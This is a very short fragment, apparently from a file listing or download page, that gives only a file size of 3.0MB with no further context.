      Filesize

      3.0MB